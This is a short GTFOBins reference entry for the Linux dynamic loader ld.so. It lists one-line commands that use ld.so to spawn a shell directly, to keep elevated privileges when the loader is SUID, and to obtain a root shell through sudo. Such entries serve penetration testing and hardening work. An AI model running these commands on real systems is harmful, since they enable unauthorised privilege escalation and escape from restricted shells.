GTFOBins.github.io/_gtfobins/ld.so.md
2018-07-16 15:01:50 +02:00

417 B

description functions
`ld.so` is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with: ``` $ strings /proc/self/exe | head -1 /lib64/ld-linux-x86-64.so.2 ```
execute-interactive suid-enabled sudo-enabled
code
/lib/ld.so /bin/sh
code
./ld.so /bin/sh -p
code
sudo /lib/ld.so /bin/sh